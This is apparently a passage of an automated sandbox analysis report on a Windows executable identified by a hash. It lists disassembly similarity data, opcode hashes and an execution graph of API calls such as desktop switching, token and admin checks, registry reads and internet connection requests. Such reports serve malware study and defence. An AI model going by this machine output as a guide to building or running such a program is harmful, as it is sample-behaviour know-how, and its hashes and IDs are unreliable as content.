                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID: 0b@$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                          • API String ID: 3519838083-1127788396
                                                                                          • Opcode ID: 67fe996034b28f76cb8c54ffa8e5d0e07d92ad51ee6187e65b10db861899ccc3
                                                                                          • Instruction ID: 0a7e78b1046b63a78ef18d8d534c82997aec07919aeb53e0e5b8b8b5b039a86f
                                                                                          • Opcode Fuzzy Hash: 67fe996034b28f76cb8c54ffa8e5d0e07d92ad51ee6187e65b10db861899ccc3
                                                                                          • Instruction Fuzzy Hash: CE112E31958244EEC306DB98ED45BDC7F60DB15310F0080BFF954AB2D2DBB51944DB29
                                                                                          APIs
                                                                                            • Part of subcall function 003CCED7: GetWindowRect.USER32(?,?), ref: 003CCF0E
                                                                                            • Part of subcall function 003CCED7: GetClientRect.USER32(?,?), ref: 003CCF1A
                                                                                            • Part of subcall function 003CCED7: GetWindowLongW.USER32(?,000000F0), ref: 003CCFBB
                                                                                            • Part of subcall function 003CCED7: GetWindowRect.USER32(?,?), ref: 003CCFE8
                                                                                            • Part of subcall function 003CCED7: GetWindowTextW.USER32(?,?,00000400), ref: 003CD007
                                                                                          • GetDlgItem.USER32(00000000,00003021), ref: 003C132B
                                                                                          • SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rect$Text$ClientItemLong
                                                                                          • String ID: 0
                                                                                          • API String ID: 660763476-4108050209
                                                                                          • Opcode ID: 3b08870ff3811ec9cd28b2b6be545a04d078b42e351dda3ae7698f5df9ba7b97
                                                                                          • Instruction ID: 3d0e420e4e6dd15167629000cf237d97a7f963f5522662505486757d64923a8c
                                                                                          • Opcode Fuzzy Hash: 3b08870ff3811ec9cd28b2b6be545a04d078b42e351dda3ae7698f5df9ba7b97
                                                                                          • Instruction Fuzzy Hash: D3F081B864028CABDF172F608919FF93B599B06749F094018FE48D4496C774CC52FB14
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,003CFD0B,?,?,003CFD80,?,?,?,?,?,003CFD6A), ref: 003CFACD
                                                                                          • GetLastError.KERNEL32(?,?,003CFD80,?,?,?,?,?,003CFD6A), ref: 003CFAD9
                                                                                            • Part of subcall function 003C6DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C6DF1
                                                                                          Strings
                                                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 003CFAE2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                          • API String ID: 1091760877-2248577382
                                                                                          • Opcode ID: 7f7670d64126836b2b68755480e3292bffa0197f72678c7e8484810fb3e339dc
                                                                                          • Instruction ID: 067b56f8637be0e913f59a013c80fecbbdfbc8c1737cd0caf677088b73bdda71
                                                                                          • Opcode Fuzzy Hash: 7f7670d64126836b2b68755480e3292bffa0197f72678c7e8484810fb3e339dc
                                                                                          • Instruction Fuzzy Hash: 59D0177564852666D60723285D0AFBE79099B12730F250719F23AA91F6CE240C5287A5

                                                                                          Execution Graph

                                                                                          Execution Coverage:5%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:15.2%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:104
                                                                                          execution_graph 94443 11108d30 94486 1110f420 94443->94486 94446 11108da9 OpenEventA 94449 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 94446->94449 94450 11108e18 CloseHandle GetSystemDirectoryA 94446->94450 94451 1110f420 std::_Mutex::_Mutex 265 API calls 94449->94451 94452 11108e38 94450->94452 94453 11108f23 94451->94453 94452->94452 94454 11108e40 LoadLibraryA 94452->94454 94455 11108f3c 94453->94455 94563 110f4680 268 API calls std::_Mutex::_Mutex 94453->94563 94454->94449 94456 11108e71 94454->94456 94514 1110f2b0 94455->94514 94530 111450a0 94456->94530 94460 11108e7b 94462 11108e82 GetProcAddress 94460->94462 94463 11108e9a GetProcAddress 94460->94463 94462->94463 94465 11108ec4 FreeLibrary 94463->94465 94466 11108eb6 94463->94466 94465->94449 94466->94449 94468 11109005 94566 11161d01 94468->94566 94470 1110f420 std::_Mutex::_Mutex 265 API calls 94472 11108f73 94470->94472 94471 1110901f 94473 11108f84 94472->94473 94474 11108f8d 94472->94474 94564 110f4680 268 API calls std::_Mutex::_Mutex 94473->94564 94476 1110f2b0 426 API calls 94474->94476 94477 11108fa9 CloseHandle 94476->94477 94478 111450a0 std::_Mutex::_Mutex 90 API calls 94477->94478 94479 11108fba 94478->94479 94479->94468 94480 1110f420 std::_Mutex::_Mutex 265 API calls 94479->94480 94481 11108fc8 94480->94481 94484 11108fe2 94481->94484 94565 110f4680 268 API calls std::_Mutex::_Mutex 94481->94565 94483 1110f2b0 426 API calls 94485 11108ffe CloseHandle 94483->94485 94484->94483 94485->94468 94574 11162b51 94486->94574 94489 1110f447 wsprintfA 94591 11029450 265 API calls 2 library calls 94489->94591 94491 1110f473 _memset 94493 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 94491->94493 94494 11108d91 94493->94494 94494->94446 94495 11107290 94494->94495 94600 1110f520 94495->94600 94498 1110f520 3 API calls 94499 111072dc 94498->94499 94500 1110f520 3 API calls 94499->94500 94501 111072ee 94500->94501 94502 1110f520 3 API calls 94501->94502 94503 111072ff 94502->94503 94504 1110f520 3 API calls 94503->94504 94505 11107310 94504->94505 94506 1110f420 std::_Mutex::_Mutex 265 API calls 94505->94506 94507 11107321 94506->94507 94508 1110740a 94507->94508 94509 1110732c LoadLibraryA LoadLibraryA 94507->94509 94607 1116219a 66 API calls std::exception::_Copy_str 94508->94607 94509->94446 94511 11107419 94608 111625f1 RaiseException 94511->94608 94513 1110742e 94515 1110f2bf CreateEventA 94514->94515 94516 1110f2d0 CreateThread 94514->94516 94515->94516 94518 1110f2f6 94516->94518 94519 1110f30d 94516->94519 94612 11102c50 94516->94612 94634 1110fde0 94516->94634 94648 11027270 94516->94648 94673 1102c410 94516->94673 94611 11029450 265 API calls 2 library calls 94518->94611 94520 1110f311 WaitForSingleObject CloseHandle 94519->94520 94521 11108f58 CloseHandle 94519->94521 94520->94521 94524 1109e9e0 94521->94524 94525 1109e9ef GetCurrentProcess OpenProcessToken 94524->94525 94526 1109ea2d 94524->94526 94525->94526 94527 1109ea12 94525->94527 94526->94468 94526->94470 95067 1109e910 94527->95067 94529 1109ea1b CloseHandle 94529->94526 94531 111450c1 GetVersionExA 94530->94531 94532 1114529c 94530->94532 94531->94532 94533 111450e3 94531->94533 94534 111452a5 94532->94534 94538 11145304 94532->94538 95091 11081c60 94532->95091 94533->94532 94535 111450f0 RegOpenKeyExA 94533->94535 94536 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 94534->94536 94535->94532 94541 1114511d _memset 94535->94541 94537 111452b2 94536->94537 94537->94460 94539 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 94538->94539 94540 11145314 94539->94540 94540->94460 95080 11143000 RegQueryValueExA 94541->95080 94545 111452ec 94545->94534 94548 11162de7 std::_Mutex::_Mutex 79 API calls 94545->94548 94546 11143000 std::_Mutex::_Mutex RegQueryValueExA 94547 11145189 94546->94547 94549 1114528f RegCloseKey 94547->94549 95082 11162de7 94547->95082 94550 111452fd 94548->94550 94549->94532 94550->94534 94550->94538 94554 111451ad 94555 111451c6 94554->94555 94556 11163a2d std::_Mutex::_Mutex 79 API calls 94554->94556 94557 11162de7 std::_Mutex::_Mutex 79 API calls 94555->94557 94556->94554 94559 111451d2 _strncpy 94557->94559 94558 11145271 94558->94549 94559->94558 94560 11143000 std::_Mutex::_Mutex RegQueryValueExA 94559->94560 94561 11145248 94560->94561 94562 11143000 std::_Mutex::_Mutex RegQueryValueExA 94561->94562 94562->94558 94563->94455 94564->94474 94565->94484 94567 11161d0b IsDebuggerPresent 94566->94567 94568 11161d09 94566->94568 95239 11177637 94567->95239 94568->94471 94571 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 94572 1116bcbe GetCurrentProcess TerminateProcess 94571->94572 94573 1116bcb6 __call_reportfault 94571->94573 94572->94471 94573->94572 94575 11162bce 94574->94575 94588 11162b5f 94574->94588 94598 1116d4a8 DecodePointer 94575->94598 94577 11162bd4 94599 111692ef 66 API calls __getptd_noexit 94577->94599 94578 11162b6a 94578->94588 94592 1116d99d 66 API calls __NMSG_WRITE 94578->94592 94593 1116d7ee 66 API calls 6 library calls 94578->94593 94594 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 94578->94594 94581 11162b8d RtlAllocateHeap 94582 1110f43e 94581->94582 94581->94588 94582->94489 94582->94491 94584 11162bba 94596 111692ef 66 API calls __getptd_noexit 94584->94596 94588->94578 94588->94581 94588->94584 94589 11162bb8 94588->94589 94595 1116d4a8 DecodePointer 94588->94595 94597 111692ef 66 API calls __getptd_noexit 94589->94597 94592->94578 94593->94578 94595->94588 94596->94589 94597->94582 94598->94577 94599->94582 94601 1110f536 CreateEventA 94600->94601 94602 1110f549 94600->94602 94601->94602 94604 1110f557 94602->94604 94609 1110f260 InterlockedIncrement 94602->94609 94605 111072cc 94604->94605 94610 1110f3c0 InterlockedIncrement 94604->94610 94605->94498 94607->94511 94608->94513 94609->94604 94610->94605 94708 11089280 94612->94708 94614 11102c5d 94615 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 94614->94615 94616 11102ccf GetLastError 94615->94616 94617 11102c8f SetThreadDesktop 94615->94617 94620 11146450 std::_Mutex::_Mutex 21 API calls 94616->94620 94618 11102cb1 GetLastError 94617->94618 94619 11102c9a 94617->94619 94622 11146450 std::_Mutex::_Mutex 21 API calls 94618->94622 94719 11146450 94619->94719 94623 11102ce1 94620->94623 94625 11102cc3 CloseDesktop 94622->94625 94713 11102bd0 94623->94713 94625->94623 94627 11102ceb 94725 1110f340 94627->94725 94629 11102cf2 94730 110f4740 16 API calls 94629->94730 94631 11102cf9 94731 1110f370 SetEvent PulseEvent 94631->94731 94633 11102d00 std::ios_base::_Ios_base_dtor 94784 110b7a20 94634->94784 94636 1110fdee GetCurrentThreadId 94637 1110f340 266 API calls 94636->94637 94643 1110fe09 std::ios_base::_Ios_base_dtor 94637->94643 94638 1110fe80 94788 1110f370 SetEvent PulseEvent 94638->94788 94640 1110fe20 WaitForSingleObject 94786 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 94640->94786 94641 1110fe8a 94643->94638 94643->94640 94644 1110fe43 94643->94644 94787 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 94643->94787 94645 1110fe53 PostMessageA 94644->94645 94646 1110fe58 PostThreadMessageA 94644->94646 94645->94643 94646->94643 94649 110272a2 94648->94649 94650 11089280 5 API calls 94649->94650 94651 110272a9 CreateEventA 94650->94651 94652 1110f420 std::_Mutex::_Mutex 265 API calls 94651->94652 94653 110272c6 94652->94653 94654 110272e7 94653->94654 94789 111100d0 94653->94789 94656 1110f340 266 API calls 94654->94656 94666 110272ff 94656->94666 94657 11027316 WaitForMultipleObjects 94658 1102732d 94657->94658 94657->94666 94659 11027336 PostMessageA 94658->94659 94660 1102734a SetEvent Sleep 94658->94660 94659->94660 94659->94666 94660->94666 94661 110273f4 94662 1102740e CloseHandle 94661->94662 94818 1110fc70 278 API calls 2 library calls 94661->94818 94819 1110f370 SetEvent PulseEvent 94662->94819 94663 11027375 PostMessageA 94663->94666 94666->94657 94666->94661 94666->94663 94670 110273ba GetCurrentThreadId GetThreadDesktop 94666->94670 94817 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 94666->94817 94667 11027423 94669 11027405 std::ios_base::_Ios_base_dtor 94669->94662 94670->94666 94671 110273c9 SetThreadDesktop 94670->94671 94671->94666 94672 110273d4 CloseDesktop 94671->94672 94672->94666 94674 1102c442 94673->94674 94675 1110f340 266 API calls 94674->94675 94676 1102c44f WaitForSingleObject 94675->94676 94677 1102c466 94676->94677 94678 1102c67d 94676->94678 94680 1102c470 GetTickCount 94677->94680 94681 1102c666 WaitForSingleObject 94677->94681 94919 1110f370 SetEvent PulseEvent 94678->94919 94823 110d1550 94680->94823 94681->94677 94681->94678 94682 1102c684 CloseHandle 94920 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 94682->94920 94685 1102c695 std::ios_base::_Ios_base_dtor 94686 110d1550 268 API calls 94697 1102c486 94686->94697 94688 1102c6b4 94921 11029450 265 API calls 2 library calls 94688->94921 94690 1102c6c8 94922 11029450 265 API calls 2 library calls 94690->94922 94692 1102c6dc 94923 11029450 265 API calls 2 library calls 94692->94923 94695 1102c6f0 94924 11029450 265 API calls 2 library calls 94695->94924 94696 1102c574 GetTickCount 94706 1102c571 std::ios_base::_Ios_base_dtor 94696->94706 94697->94686 94697->94688 94697->94690 94697->94692 94697->94696 94833 110d0710 94697->94833 94845 11029590 LoadLibraryA 94697->94845 94899 110d1370 269 API calls 2 library calls 94697->94899 94700 11146450 std::_Mutex::_Mutex 21 API calls 94700->94706 94702 110d07c0 265 API calls 94702->94706 94706->94688 94706->94690 94706->94695 94706->94696 94706->94700 94706->94702 94707 110679c0 298 API calls 94706->94707 94900 11142290 94706->94900 94909 11042530 267 API calls 2 library calls 94706->94909 94910 110d07c0 94706->94910 94707->94706 94732 1110f6c0 94708->94732 94710 11089290 94711 110892b3 94710->94711 94712 110892a2 UnhookWindowsHookEx 94710->94712 94711->94614 94712->94711 94714 1110f420 std::_Mutex::_Mutex 265 API calls 94713->94714 94715 11102bfd 94714->94715 94716 11102c30 94715->94716 94738 11102ab0 94715->94738 94716->94627 94718 11102c1d 94718->94627 94720 11146461 94719->94720 94721 1114645c 94719->94721 94758 111458f0 94720->94758 94761 111456a0 18 API calls std::_Mutex::_Mutex 94721->94761 94726 1110f360 SetEvent 94725->94726 94727 1110f349 94725->94727 94726->94629 94783 11029450 265 API calls 2 library calls 94727->94783 94730->94631 94731->94633 94733 1110f6d7 EnterCriticalSection 94732->94733 94734 1110f6ce GetCurrentThreadId 94732->94734 94735 1110f6ee ___DllMainCRTStartup 94733->94735 94734->94733 94736 1110f6f5 LeaveCriticalSection 94735->94736 94737 1110f708 LeaveCriticalSection 94735->94737 94736->94710 94737->94710 94745 1115f550 94738->94745 94741 11102b81 CreateWindowExA 94741->94718 94742 11102b17 std::_Mutex::_Mutex 94743 11102b50 GetStockObject RegisterClassA 94742->94743 94743->94741 94744 11102b7a 94743->94744 94744->94741 94748 1115e380 GlobalAddAtomA 94745->94748 94749 1115e3b5 GetLastError wsprintfA 94748->94749 94750 1115e407 GlobalAddAtomA GlobalAddAtomA 94748->94750 94757 11029450 265 API calls 2 library calls 94749->94757 94752 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 94750->94752 94754 11102ae1 GlobalAddAtomA 94752->94754 94754->94741 94754->94742 94762 111457a0 94758->94762 94760 11102ca5 CloseDesktop 94760->94623 94761->94720 94763 111457c4 94762->94763 94764 111457c9 94762->94764 94782 111456a0 18 API calls std::_Mutex::_Mutex 94763->94782 94766 11145832 94764->94766 94767 111457d2 94764->94767 94768 111458de 94766->94768 94769 1114583f wsprintfA 94766->94769 94770 11145809 94767->94770 94771 111457e0 94767->94771 94772 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 94768->94772 94773 11145862 94769->94773 94776 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 94770->94776 94779 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 94771->94779 94775 111458ea 94772->94775 94773->94773 94774 11145869 wvsprintfA 94773->94774 94778 11145884 94774->94778 94775->94760 94777 1114582e 94776->94777 94777->94760 94778->94778 94781 111458d1 OutputDebugStringA 94778->94781 94780 11145805 94779->94780 94780->94760 94781->94768 94782->94764 94785 110b7a28 std::_Mutex::_Mutex 94784->94785 94785->94636 94786->94643 94787->94643 94788->94641 94790 1110f420 std::_Mutex::_Mutex 265 API calls 94789->94790 94791 11110101 94790->94791 94793 1110f420 std::_Mutex::_Mutex 265 API calls 94791->94793 94799 11110123 GetCurrentThreadId InitializeCriticalSection 94791->94799 94798 1111011c 94793->94798 94794 11110190 EnterCriticalSection 94796 1111024a LeaveCriticalSection 94794->94796 94797 111101be CreateEventA 94794->94797 94795 11110183 InitializeCriticalSection 94795->94794 94796->94654 94801 111101d1 94797->94801 94802 111101e8 94797->94802 94798->94799 94820 1116219a 66 API calls std::exception::_Copy_str 94798->94820 94799->94794 94799->94795 94822 11029450 265 API calls 2 library calls 94801->94822 94805 1110f420 std::_Mutex::_Mutex 265 API calls 94802->94805 94803 1111013f 94821 111625f1 RaiseException 94803->94821 94808 111101ef 94805->94808 94809 1111020c 94808->94809 94810 111100d0 420 API calls 94808->94810 94811 1110f420 std::_Mutex::_Mutex 265 API calls 94809->94811 94810->94809 94812 1111021c 94811->94812 94813 1111022d 94812->94813 94814 1110f520 3 API calls 94812->94814 94815 1110f2b0 420 API calls 94813->94815 94814->94813 94816 11110245 94815->94816 94816->94796 94817->94666 94818->94669 94819->94667 94820->94803 94821->94799 94925 110d1480 94823->94925 94826 110d159b 94829 110d15b5 94826->94829 94830 110d1598 94826->94830 94827 110d1584 94939 11029450 265 API calls 2 library calls 94827->94939 94829->94697 94830->94826 94940 11029450 265 API calls 2 library calls 94830->94940 94834 110d0724 94833->94834 94998 11163cf8 94834->94998 94836 110d072f 94836->94836 94837 110d0450 265 API calls 94836->94837 94838 110d0753 94837->94838 95006 110cfe70 94838->95006 94841 110d077c 94841->94697 94842 110d0765 95018 11029450 265 API calls 2 library calls 94842->95018 94876 11029621 std::ios_base::_Ios_base_dtor 94845->94876 94846 11029653 GetProcAddress 94847 1102966c InternetCloseHandle 94846->94847 94848 11029671 SetLastError 94846->94848 94847->94876 94848->94876 94849 11029748 InternetOpenA 94849->94876 94850 1102972f GetProcAddress 94850->94849 94851 11029779 SetLastError 94850->94851 94851->94876 94852 110296a5 GetProcAddress 94853 11029762 SetLastError 94852->94853 94852->94876 94854 110296d2 GetLastError 94853->94854 94854->94876 94855 11142290 std::_Mutex::_Mutex 265 API calls 94855->94876 94856 11162be5 66 API calls _free 94856->94876 94857 110296f5 GetProcAddress 94858 1102976f SetLastError 94857->94858 94857->94876 94858->94876 94859 11162b51 66 API calls _malloc 94859->94876 94860 11029a40 94864 11029b76 GetProcAddress 94860->94864 94865 11029a31 94860->94865 94861 11029bb0 94861->94706 94862 11029ba9 FreeLibrary 94862->94861 94863 11029a1a std::ios_base::_Ios_base_dtor 94863->94860 94863->94865 94866 11029a57 GetProcAddress 94863->94866 94869 11029b36 std::ios_base::_Ios_base_dtor 94863->94869 94871 11029a88 std::ios_base::_Ios_base_dtor 94863->94871 94864->94865 94868 11029b97 SetLastError 94864->94868 94865->94861 94865->94862 94866->94863 94867 11029b2e SetLastError 94866->94867 94867->94869 94868->94865 95051 110278a0 GetProcAddress SetLastError 94869->95051 94870 11081a70 IsDBCSLeadByte 94870->94876 94871->94863 94871->94869 94889 110d1090 268 API calls 94871->94889 95043 1110f4a0 94871->95043 95050 11027850 GetProcAddress SetLastError 94871->95050 94874 11029b5b 95052 110278a0 GetProcAddress SetLastError 94874->95052 94876->94846 94876->94847 94876->94849 94876->94850 94876->94852 94876->94854 94876->94855 94876->94856 94876->94857 94876->94859 94876->94863 94876->94870 94877 110297ff GetProcAddress 94876->94877 94878 1102982b GetProcAddress 94876->94878 94879 1102983e InternetConnectA 94876->94879 94884 110298a3 GetProcAddress 94876->94884 94885 110298b9 HttpOpenRequestA 94876->94885 94886 11029864 GetProcAddress 94876->94886 94890 110298f1 GetProcAddress 94876->94890 94892 11029922 GetLastError 94876->94892 94895 11029975 GetLastError 94876->94895 94896 1102998c GetDesktopWindow 94876->94896 94877->94876 94881 1102981c SetLastError 94877->94881 94878->94879 94883 11029881 SetLastError 94878->94883 94879->94876 94880 11029b6a 94880->94860 94881->94876 94883->94876 94884->94885 94887 110298d6 SetLastError 94884->94887 94885->94876 94886->94876 94888 11029891 SetLastError 94886->94888 94887->94876 94888->94876 94889->94871 94890->94876 94891 11029918 SetLastError 94890->94891 94891->94892 94892->94876 94893 1102993d GetProcAddress 94892->94893 94893->94876 94894 1102996d SetLastError 94893->94894 94894->94895 94895->94876 94895->94896 94896->94876 94897 1102999a GetProcAddress 94896->94897 94897->94876 94898 110299d6 SetLastError 94897->94898 94898->94876 94899->94697 94901 1114229a 94900->94901 94902 1114229c 94900->94902 94901->94706 94903 1110f4a0 std::_Mutex::_Mutex 265 API calls 94902->94903 94904 111422c2 94903->94904 94905 111422cb _strncpy 94904->94905 94906 111422e9 94904->94906 94905->94706 95054 11029450 265 API calls 2 library calls 94906->95054 94909->94706 95055 110d05c0 94910->95055 94913 110d07e9 95060 11162be5 94913->95060 94914 110d07d2 95059 11029450 265 API calls 2 library calls 94914->95059 94917 110d07f2 94917->94681 94919->94682 94920->94685 94926 110d148c 94925->94926 94927 110d14a7 94926->94927 94928 110d1490 94926->94928 94941 110d0190 94927->94941 94970 11029450 265 API calls 2 library calls 94928->94970 94935 110d14de 94935->94826 94935->94827 94936 110d14c7 94971 11029450 265 API calls 2 library calls 94936->94971 94942 110d0199 94941->94942 94943 110d019d 94942->94943 94944 110d01b4 94942->94944 94972 11029450 265 API calls 2 library calls 94943->94972 94946 110d01b1 94944->94946 94947 110d01e8 94944->94947 94946->94944 94973 11029450 265 API calls 2 library calls 94946->94973 94949 110d01e5 94947->94949 94950 110d0206 94947->94950 94949->94947 94974 11029450 265 API calls 2 library calls 94949->94974 94953 110d1090 94950->94953 94954 110d109e 94953->94954 94955 110d10b9 94954->94955 94956 110d10a2 94954->94956 94958 110d10b6 94955->94958 94960 110d10ec 94955->94960 94975 11029450 265 API calls 2 library calls 94956->94975 94958->94955 94976 11029450 265 API calls 2 library calls 94958->94976 94959 110d1160 94959->94935 94959->94936 94960->94959 94960->94960 94977 110d09e0 94960->94977 94966 110d111f _memmove 94966->94959 94967 110d1149 94966->94967 94989 11029450 265 API calls 2 library calls 94967->94989 94978 110d09ed 94977->94978 94979 110d0a08 94978->94979 94980 110d09f1 94978->94980 94981 110d0a26 94979->94981 94985 110d0a05 94979->94985 94995 11029450 265 API calls 2 library calls 94980->94995 94990 110d0450 94981->94990 94985->94979 94996 11029450 265 API calls 2 library calls 94985->94996 94988 110d0920 268 API calls 2 library calls 94988->94966 94991 110d045b 94990->94991 94992 110d0472 94990->94992 94997 11029450 265 API calls 2 library calls 94991->94997 94992->94966 94992->94988 94999 11163d05 94998->94999 95000 11163d09 _strlen 94998->95000 94999->94836 95001 11162b51 _malloc 66 API calls 95000->95001 95002 11163d1c 95001->95002 95002->94999 95019 1116be9f 95002->95019 95007 110cfe7d 95006->95007 95008 110cfe98 95007->95008 95009 110cfe81 95007->95009 95011 110cfe95 95008->95011 95013 110cfeb6 95008->95013 95040 11029450 265 API calls 2 library calls 95009->95040 95011->95008 95041 11029450 265 API calls 2 library calls 95011->95041 95014 110cfeb3 95013->95014 95017 110cfed9 95013->95017 95014->95013 95042 11029450 265 API calls 2 library calls 95014->95042 95017->94841 95017->94842 95020 1116beb4 95019->95020 95021 1116bead 95019->95021 95031 111692ef 66 API calls __getptd_noexit 95020->95031 95021->95020 95023 1116bed2 95021->95023 95025 11163d2e 95023->95025 95033 111692ef 66 API calls __getptd_noexit 95023->95033 95025->94999 95028 1116deb2 95025->95028 95027 1116beb9 95032 1116df04 11 API calls __lseeki64 95027->95032 95034 1116dd89 95028->95034 95031->95027 95032->95025 95033->95027 95035 1116dda8 _memset __call_reportfault 95034->95035 95036 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 95035->95036 95039 1116de94 __call_reportfault 95036->95039 95037 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95038 1116deb0 GetCurrentProcess TerminateProcess 95037->95038 95038->94999 95039->95037 95044 11162b51 _malloc 66 API calls 95043->95044 95045 1110f4ae 95044->95045 95046 1110f4b7 95045->95046 95047 1110f4ce _memset 95045->95047 95053 11029450 265 API calls 2 library calls 95046->95053 95047->94871 95050->94871 95051->94874 95052->94880 95056 110d05ec 95055->95056 95057 110d05d9 95055->95057 95056->94913 95056->94914 95057->95056 95058 110d0450 265 API calls 95057->95058 95058->95056 95061 11162bf0 HeapFree 95060->95061 95062 11162c19 _free 95060->95062 95061->95062 95063 11162c05 95061->95063 95062->94917 95066 111692ef 66 API calls __getptd_noexit 95063->95066 95065 11162c0b GetLastError 95065->95062 95066->95065 95068 1109e9c6 95067->95068 95069 1109e930 GetTokenInformation 95067->95069 95070 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95068->95070 95071 1109e952 __crtCompareStringA_stat 95069->95071 95072 1109e9d8 95070->95072 95071->95068 95073 1109e958 GetTokenInformation 95071->95073 95072->94529 95073->95068 95074 1109e96a 95073->95074 95075 1109e99f EqualSid 95074->95075 95076 1109e973 AllocateAndInitializeSid 95074->95076 95075->95068 95077 1109e9ad 95075->95077 95076->95068 95076->95075 95078 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95077->95078 95079 1109e9c2 95078->95079 95079->94529 95081 1114302a 95080->95081 95081->94546 95083 11162dd1 95082->95083 95101 1116364b 95083->95101 95086 11163a2d 95087 11163a4d 95086->95087 95088 11163a3b 95086->95088 95236 111639dc 79 API calls 2 library calls 95087->95236 95088->94554 95090 11163a57 95090->94554 95092 11081c6d 95091->95092 95093 11081c72 95091->95093 95237 11081990 IsDBCSLeadByte 95092->95237 95095 11081c7b 95093->95095 95099 11081c93 95093->95099 95238 11163784 85 API calls 3 library calls 95095->95238 95097 11081c8c 95097->94545 95098 11165797 85 API calls std::_Mutex::_Mutex 95098->95099 95099->95098 95100 11081c99 95099->95100 95100->94545 95102 11163664 95101->95102 95105 11163420 95102->95105 95117 11163399 95105->95117 95107 11163444 95125 111692ef 66 API calls __getptd_noexit 95107->95125 95110 11163449 95126 1116df04 11 API calls __lseeki64 95110->95126 95113 1116347a 95115 111634c1 95113->95115 95127 